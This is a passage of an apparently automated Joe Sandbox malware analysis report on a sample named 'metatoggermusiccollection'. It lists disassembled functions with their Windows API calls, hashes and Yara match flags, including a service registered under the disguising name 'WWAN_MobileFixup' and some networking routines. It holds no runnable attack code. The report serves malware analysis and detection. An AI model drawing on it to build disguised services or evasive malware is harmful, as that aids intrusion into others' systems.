                                                                            • API ID: ErrorFormatLastMessage
                                                                            • String ID:
                                                                            • API String ID: 3479602957-0
                                                                            • Opcode ID: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
                                                                            • Instruction ID: 12ac5ce72775eec7eeec92a5142f6ccb0213bab1bf9da6b5ab44ea39ce37071c
                                                                            • Opcode Fuzzy Hash: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
                                                                            • Instruction Fuzzy Hash: E8F03030208341DFEB14CE25C891B2EB7E4ABAD754F50092CF596A2191D7B0D1468B56
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AE9468 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,02AE4DD6,?,?,?,00000001), ref: 02AE946D
                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 02AE9476
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: ad84986ed02134928f7f3f518ec18499414b40b9105e6f7489909e10421b86d3
                                                                            • Instruction ID: b45f8ac4a59a8cdbb446b807b3a8168e52353d1a3f03950b26020aa8b33967c5
                                                                            • Opcode Fuzzy Hash: ad84986ed02134928f7f3f518ec18499414b40b9105e6f7489909e10421b86d3
                                                                            • Instruction Fuzzy Hash: EAB09231484208FBCB812BD1EC09B99BF28EF04762F004810F70E448508FA694229AA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AE8272 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 84COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlDecodePointer.NTDLL(?), ref: 02AE827A
                                                                            • _free.LIBCMT ref: 02AE8293
                                                                              • Part of subcall function 02AE2EB4: HeapFree.KERNEL32(00000000,00000000,?,02AE5C12,00000000,00000104,75920A60), ref: 02AE2EC8
                                                                              • Part of subcall function 02AE2EB4: GetLastError.KERNEL32(00000000,?,02AE5C12,00000000,00000104,75920A60), ref: 02AE2EDA
                                                                            • _free.LIBCMT ref: 02AE82A6
                                                                            • _free.LIBCMT ref: 02AE82C4
                                                                            • _free.LIBCMT ref: 02AE82D6
                                                                            • _free.LIBCMT ref: 02AE82E7
                                                                            • _free.LIBCMT ref: 02AE82F2
                                                                            • _free.LIBCMT ref: 02AE8316
                                                                            • RtlEncodePointer.NTDLL(007891E0), ref: 02AE831D
                                                                            • _free.LIBCMT ref: 02AE8332
                                                                            • _free.LIBCMT ref: 02AE8348
                                                                            • _free.LIBCMT ref: 02AE8370
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                            • String ID: 8Dx
                                                                            • API String ID: 3064303923-535961141
                                                                            • Opcode ID: d2c88ba6a5b1a43e90c0c17142cf7dd30a2d61dac55fb1811bf769402e6de119
                                                                            • Instruction ID: 2bfa96d05ad699b758d340e9bfb8ab12bb89925c5c5a52ae6f9fc453bd38ac21
                                                                            • Opcode Fuzzy Hash: d2c88ba6a5b1a43e90c0c17142cf7dd30a2d61dac55fb1811bf769402e6de119
                                                                            • Instruction Fuzzy Hash: 68219131CC17218FCE266F14E9C0A0A7BA9AF147A03090969EC0697258DF389C66CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD24E1 Relevance: 21.2, APIs: 14, Instructions: 173COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD24E6
                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02AD24FC
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02AD250E
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02AD256D
                                                                            • SetLastError.KERNEL32(00000000,?,7591DFB0), ref: 02AD257F
                                                                            • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,7591DFB0), ref: 02AD2599
                                                                            • GetLastError.KERNEL32(?,7591DFB0), ref: 02AD25A2
                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02AD25F0
                                                                            • InterlockedDecrement.KERNEL32(00000002), ref: 02AD262F
                                                                            • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02AD268E
                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02AD2699
                                                                            • InterlockedExchange.KERNEL32(00000000,00000001), ref: 02AD26AD
                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,7591DFB0), ref: 02AD26BD
                                                                            • GetLastError.KERNEL32(?,7591DFB0), ref: 02AD26C7
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                            • String ID:
                                                                            • API String ID: 1213838671-0
                                                                            • Opcode ID: d5eda192ed661ad5085bd0276ac7b58ec85186624661cf84906613b0eceeeba3
                                                                            • Instruction ID: c1408b715de0502ea5eb8e4339de59c8dd50cfa89a721d63ef753585ce7bae9e
                                                                            • Opcode Fuzzy Hash: d5eda192ed661ad5085bd0276ac7b58ec85186624661cf84906613b0eceeeba3
                                                                            • Instruction Fuzzy Hash: 3B612CB1940209AFCB50DFE4D988AAEFBB9FF08310F10456AE916E3641DB34E955CF60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD4603 Relevance: 19.9, APIs: 13, Instructions: 442networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD4608
                                                                              • Part of subcall function 02AE3A8F: _malloc.LIBCMT ref: 02AE3AA7
                                                                            • htons.WS2_32(?), ref: 02AD4669
                                                                            • htonl.WS2_32(?), ref: 02AD468C
                                                                            • htonl.WS2_32(00000000), ref: 02AD4693
                                                                            • htons.WS2_32(00000000), ref: 02AD4747
                                                                            • _sprintf.LIBCMT ref: 02AD475D
                                                                              • Part of subcall function 02AD88BF: _memmove.LIBCMT ref: 02AD88DF
                                                                            • htons.WS2_32(?), ref: 02AD46B0
                                                                              • Part of subcall function 02AD966A: __EH_prolog.LIBCMT ref: 02AD966F
                                                                              • Part of subcall function 02AD966A: RtlEnterCriticalSection.NTDLL(00000020), ref: 02AD96EA
                                                                              • Part of subcall function 02AD966A: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02AD9708
                                                                              • Part of subcall function 02AD1BA7: __EH_prolog.LIBCMT ref: 02AD1BAC
                                                                              • Part of subcall function 02AD1BA7: RtlEnterCriticalSection.NTDLL ref: 02AD1BBC
                                                                              • Part of subcall function 02AD1BA7: RtlLeaveCriticalSection.NTDLL ref: 02AD1BEA
                                                                              • Part of subcall function 02AD1BA7: RtlEnterCriticalSection.NTDLL ref: 02AD1C13
                                                                              • Part of subcall function 02AD1BA7: RtlLeaveCriticalSection.NTDLL ref: 02AD1C56
                                                                              • Part of subcall function 02ADDE26: __EH_prolog.LIBCMT ref: 02ADDE2B
                                                                            • htonl.WS2_32(?), ref: 02AD497C
                                                                            • htonl.WS2_32(00000000), ref: 02AD4983
                                                                            • htonl.WS2_32(00000000), ref: 02AD49C8
                                                                            • htonl.WS2_32(00000000), ref: 02AD49CF
                                                                            • htons.WS2_32(?), ref: 02AD49EF
                                                                            • htons.WS2_32(?), ref: 02AD49F9
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
                                                                            • String ID:
                                                                            • API String ID: 1645262487-0
                                                                            • Opcode ID: 15106b0644c51c3f5fe0a15538115e9a076fff66b942c1dac987c5e73be84aa0
                                                                            • Instruction ID: b53f2d978bf9b7972de35f420775520c144fd174e27425b8da4b443e3415ceef
                                                                            • Opcode Fuzzy Hash: 15106b0644c51c3f5fe0a15538115e9a076fff66b942c1dac987c5e73be84aa0
                                                                            • Instruction Fuzzy Hash: FB022871C40259EFEF15DBE4C944BEEBBB9AF08304F10459AE506A7280DB746A49CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004023B3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 75registrysynchronizationthreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegisterServiceCtrlHandlerA.ADVAPI32(WWAN_MobileFixup 2.33.197.66,Function_0000235E), ref: 004023C1
                                                                            • SetServiceStatus.ADVAPI32(0040A110), ref: 00402420
                                                                            • GetLastError.KERNEL32 ref: 00402422
                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
                                                                            • GetLastError.KERNEL32 ref: 00402450
                                                                            • SetServiceStatus.ADVAPI32(0040A110), ref: 00402480
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
                                                                            • CloseHandle.KERNEL32 ref: 004024A1
                                                                            • SetServiceStatus.ADVAPI32(0040A110), ref: 004024CA
                                                                            Strings
                                                                            • WWAN_MobileFixup 2.33.197.66, xrefs: 004023BC
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                            • String ID: WWAN_MobileFixup 2.33.197.66
                                                                            • API String ID: 3346042915-2719033208
                                                                            • Opcode ID: 221372e02594791a34832dfa3998b7de0c824a95239fe2b27a61cd26514d68eb
                                                                            • Instruction ID: 16ab96e2cb68f3bca67a8d02827ccf702012fa4ba7b91bfe8048b6e668af4302
                                                                            • Opcode Fuzzy Hash: 221372e02594791a34832dfa3998b7de0c824a95239fe2b27a61cd26514d68eb
                                                                            • Instruction Fuzzy Hash: A621ECB0841310ABC2109F16EF4D9167EB8EBCA758F11413AE105BA2B2C7B94575CFAE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD3423 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 94libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD3428
                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02AD346B
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02AD3472
                                                                            • GetLastError.KERNEL32 ref: 02AD3486
                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02AD34D7
                                                                            • RtlEnterCriticalSection.NTDLL(00000018), ref: 02AD34ED
                                                                            • RtlLeaveCriticalSection.NTDLL(00000018), ref: 02AD3518
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                            • String ID: CancelIoEx$KERNEL32
                                                                            • API String ID: 2902213904-434325024
                                                                            • Opcode ID: adbd28b416eced959c6df3d03ec3944d56cb1fcd2639ad4781bb8ff93f0ab6ea
                                                                            • Instruction ID: efbb902213541ebf70fb35894e2b7107e0c684f47bfd8edba4cc8930e5ede20c
                                                                            • Opcode Fuzzy Hash: adbd28b416eced959c6df3d03ec3944d56cb1fcd2639ad4781bb8ff93f0ab6ea
                                                                            • Instruction Fuzzy Hash: 53317EB1900205DFDF11AFA4C984A6ABBF9FF48311F008499E9169B240CF78D911CFA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405857 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00404D1D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406530,?,00406580,?,?,?,Runtime Error!Program: ), ref: 00405869
                                                                            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00405881
                                                                            • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00405892
                                                                            • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0040589F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoad
                                                                            • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                            • API String ID: 2238633743-4044615076
                                                                            • Opcode ID: a1fdb014e8dea29639177d20d343b616e560619fb48a784863710210177faac4
                                                                            • Instruction ID: 8e14f7a6750b1570260f033f2342e22bcd7c780a38ad1719db35514165c9b09a
                                                                            • Opcode Fuzzy Hash: a1fdb014e8dea29639177d20d343b616e560619fb48a784863710210177faac4
                                                                            • Instruction Fuzzy Hash: 9F015232600701AFDB11EFB5AD80A1B3BE8EB45740315043AB909F2591D678D8359F69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405B1F Relevance: 13.7, APIs: 9, Instructions: 177COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LCMapStringW.KERNEL32(00000000,00000100,004065FC,00000001,00000000,00000000,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405B61
                                                                            • LCMapStringA.KERNEL32(00000000,00000100,004065F8,00000001,00000000,00000000,?,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405B7D
                                                                            • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,00404E93,?,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405BC6
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405BFE
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405C56
                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405C6C
                                                                            • LCMapStringW.KERNEL32(00000000,?,00404E93,00000000,00404E93,?,?,00404E93,00200020,00000000,?,00000000), ref: 00405C9F
                                                                            • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405D07
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: String$ByteCharMultiWide
                                                                            • String ID:
                                                                            • API String ID: 352835431-0
                                                                            • Opcode ID: 585e295b11037126dfcd064dc94fe4f66704bff1de9b4c7a404ff84c747eed69
                                                                            • Instruction ID: 228655485731442308ac41690fb54a5bf4aece3cc6a962a44786cceaeb1d8e11
                                                                            • Opcode Fuzzy Hash: 585e295b11037126dfcd064dc94fe4f66704bff1de9b4c7a404ff84c747eed69
                                                                            • Instruction Fuzzy Hash: 94518931504609AFDF228F55CD45EAF7FB9EB48744F20412AF912B12A0D3398D21DF69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00404BF9 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00404C66
                                                                            • GetStdHandle.KERNEL32(000000F4,00406530,00000000,?,00000000,00000000), ref: 00404D3C
                                                                            • WriteFile.KERNEL32(00000000), ref: 00404D43
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: File$HandleModuleNameWrite
                                                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                            • API String ID: 3784150691-4022980321
                                                                            • Opcode ID: b6dd7ce0089c197cf693ca265a150b89f405fd2be0e3a5b5ca2c0cc9865f6c54
                                                                            • Instruction ID: f140c2e8ca9dd112070b7b1a63e93dd9695d020ae797257d07982e8dddccbb03
                                                                            • Opcode Fuzzy Hash: b6dd7ce0089c197cf693ca265a150b89f405fd2be0e3a5b5ca2c0cc9865f6c54
                                                                            • Instruction Fuzzy Hash: 5531E5B2A012186FEF20E760DE49FDA336CEF85304F1005BBF945B61D0D6B89E548A19
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00404710 Relevance: 12.1, APIs: 8, Instructions: 132COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040472B
                                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040473F
                                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040476B
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047A3
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047C5
                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047DE
                                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 004047F1
                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040482F
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                            • String ID:
                                                                            • API String ID: 1823725401-0
                                                                            • Opcode ID: 3561de5b01a372d6e215d3622bd3220d2b84138c13fabd42e705c73002b4d0d2
                                                                            • Instruction ID: 34ba4f5269201e1e594d4a21fe80140370f79d481ab45775fabf70a7e665ef6c
                                                                            • Opcode Fuzzy Hash: 3561de5b01a372d6e215d3622bd3220d2b84138c13fabd42e705c73002b4d0d2
                                                                            • Instruction Fuzzy Hash: E631C2F75042656FD7207FB99D8483BB69CE6C6358716093BFB42F3280D7798C4182AA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AE1550 Relevance: 10.6, APIs: 7, Instructions: 132COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenEventA.KERNEL32(00100002,00000000,00000000,3156A85A), ref: 02AE15F0
                                                                            • CloseHandle.KERNEL32(00000000), ref: 02AE1605
                                                                            • ResetEvent.KERNEL32(00000000,3156A85A), ref: 02AE160F
                                                                            • CloseHandle.KERNEL32(00000000,3156A85A), ref: 02AE1644
                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,3156A85A), ref: 02AE16BA
                                                                            • CloseHandle.KERNEL32(00000000), ref: 02AE16CF
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseEventHandle$CreateOpenReset
                                                                            • String ID:
                                                                            • API String ID: 1285874450-0
                                                                            • Opcode ID: 32c12ddb180433a03bdf2cfe43aa0ede098a66dd8bb051aea7ee3101e002c45f
                                                                            • Instruction ID: 9fcaf1d54e8fcd2def0370916918a035bd17fad6bc6d08247aad802cd19b4428
                                                                            • Opcode Fuzzy Hash: 32c12ddb180433a03bdf2cfe43aa0ede098a66dd8bb051aea7ee3101e002c45f
                                                                            • Instruction Fuzzy Hash: 7D4120B0D04368ABDF20DFA5C984BADBBB8AF05714F144619E51AAB280DB749D06CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD2081 Relevance: 10.6, APIs: 7, Instructions: 116timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02AD20AC
                                                                            • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02AD20CD
                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02AD20D8
                                                                            • InterlockedDecrement.KERNEL32(?), ref: 02AD213E
                                                                            • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02AD217A
                                                                            • InterlockedDecrement.KERNEL32(?), ref: 02AD2187
                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02AD21A6
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                                            • String ID:
                                                                            • API String ID: 1171374749-0
                                                                            • Opcode ID: e9328ae7008128bfba90026d1cd1f699bfc3cfa6b87ece5b2a421277d3507763
                                                                            • Instruction ID: b2660ca33aac0672fe9c9441980eb578ed4cf05beacc808dd89cceba4bd60d89
                                                                            • Opcode Fuzzy Hash: e9328ae7008128bfba90026d1cd1f699bfc3cfa6b87ece5b2a421277d3507763
                                                                            • Instruction Fuzzy Hash: 75413571544701AFC311DF25C884A6BBBF9EFC8754F004A1EF99A82651DB34E90ACEA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AE1662 Relevance: 10.6, APIs: 7, Instructions: 107synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 02AE1E10: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02AE166E,?,?), ref: 02AE1E3F
                                                                              • Part of subcall function 02AE1E10: CloseHandle.KERNEL32(00000000,?,?,02AE166E,?,?), ref: 02AE1E54
                                                                              • Part of subcall function 02AE1E10: SetEvent.KERNEL32(00000000,02AE166E,?,?), ref: 02AE1E67
                                                                            • OpenEventA.KERNEL32(00100002,00000000,00000000,3156A85A), ref: 02AE15F0
                                                                            • CloseHandle.KERNEL32(00000000), ref: 02AE1605
                                                                            • ResetEvent.KERNEL32(00000000,3156A85A), ref: 02AE160F
                                                                            • CloseHandle.KERNEL32(00000000,3156A85A), ref: 02AE1644
                                                                            • __CxxThrowException@8.LIBCMT ref: 02AE1675
                                                                              • Part of subcall function 02AE449A: RaiseException.KERNEL32(?,?,02ADFA92,?,?,?,?,?,?,?,02ADFA92,?,02B00F78,?), ref: 02AE44EF
                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,3156A85A), ref: 02AE16BA
                                                                            • CloseHandle.KERNEL32(00000000), ref: 02AE16CF
                                                                              • Part of subcall function 02AE1B50: GetCurrentProcessId.KERNEL32(?), ref: 02AE1BA9
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,3156A85A), ref: 02AE16DF
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                                            • String ID:
                                                                            • API String ID: 2227236058-0
                                                                            • Opcode ID: 70aa251abea3839d4001b1e0fdaded83c7dcb4b9492fd06f468ec949e61a44a6
                                                                            • Instruction ID: 9696b54ae75b277d3cdc96f6d81b79ae918117fd812fa6b07f17f5a023d6c2e3
                                                                            • Opcode Fuzzy Hash: 70aa251abea3839d4001b1e0fdaded83c7dcb4b9492fd06f468ec949e61a44a6
                                                                            • Instruction Fuzzy Hash: 2B3161B1E403689BDF20DBE4DC84BADB7B9AF05715F180119E91EEB280EB309D16CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AE5CD4 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __init_pointers.LIBCMT ref: 02AE5CD4
                                                                              • Part of subcall function 02AE8442: RtlEncodePointer.NTDLL(00000000), ref: 02AE8445
                                                                              • Part of subcall function 02AE8442: __initp_misc_winsig.LIBCMT ref: 02AE8460
                                                                              • Part of subcall function 02AE8442: GetModuleHandleW.KERNEL32(kernel32.dll,?,02B01578,00000008,00000003,02B00F5C,?,00000001), ref: 02AE91C1
                                                                              • Part of subcall function 02AE8442: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02AE91D5
                                                                              • Part of subcall function 02AE8442: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02AE91E8
                                                                              • Part of subcall function 02AE8442: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02AE91FB
                                                                              • Part of subcall function 02AE8442: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02AE920E
                                                                              • Part of subcall function 02AE8442: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02AE9221
                                                                              • Part of subcall function 02AE8442: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02AE9234
                                                                              • Part of subcall function 02AE8442: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02AE9247
                                                                              • Part of subcall function 02AE8442: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02AE925A
                                                                              • Part of subcall function 02AE8442: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02AE926D
                                                                              • Part of subcall function 02AE8442: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02AE9280
                                                                              • Part of subcall function 02AE8442: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02AE9293
                                                                              • Part of subcall function 02AE8442: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02AE92A6
                                                                              • Part of subcall function 02AE8442: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02AE92B9
